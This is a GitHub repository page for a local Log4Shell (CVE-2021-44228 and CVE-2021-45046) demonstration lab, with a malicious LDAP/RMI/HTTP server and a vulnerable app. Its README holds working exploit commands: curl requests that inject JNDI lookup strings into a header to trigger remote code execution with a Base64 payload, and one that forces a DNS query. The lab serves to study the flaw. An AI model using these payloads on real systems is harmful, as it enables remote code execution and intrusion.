Skip to content

manuel-alvarez-alvarez/log4j-cve-2021-44228

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits

gradle/wrapper

gradle/wrapper

 
 

malicious-server

malicious-server

 
 

vulnerable-app

vulnerable-app

 
 

.gitattributes

.gitattributes

 
 

.gitignore

.gitignore

 
 

README.MD

README.MD

 
 

build.gradle

build.gradle

 
 

gradlew

gradlew

 
 

gradlew.bat

gradlew.bat

 
 

settings.gradle

settings.gradle

 
 

Repository files navigation

Log4j CVE-2021-44228 and CVE-2021-45046

Requisites

Use a vulnerable JDK, for instance JDK 1.8.0_181

Usage

Malicious server

The malicious server deploys the following endpoints:

  • 1389 LDAP server
  • 1099 RMI server
  • 8081 HTTP server
./gradlew :malicious-server:bootRun

Vulnerable application

The vulnerable application deploys one HTTP endpoint at 8082

./gradlew :vulnerable-app:bootRun

Remote Code Execution

Choose a payload that will be executed by the vulnerable app and encode it in Base64. As an example, in order to open the calculator in Windows: calc.exe

LDAP

curl --header "X-Vulnerable-Header: ${jndi:ldap://localhost:1389/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/

RMI

curl --header "X-Vulnerable-Header: ${jndi:rmi://localhost:1099/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/

DNS queries

curl --header "X-Vulnerable-Header: ${jndi:dns://8.8.8.8/google.es}" http://127.0.0.1:8082/

About

Log4j CVE-2021-44228 examples: Remote Code Execution (through LDAP, RMI, ...), Forced DNS queries, ...

Resources

Readme
Activity

Stars

4 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages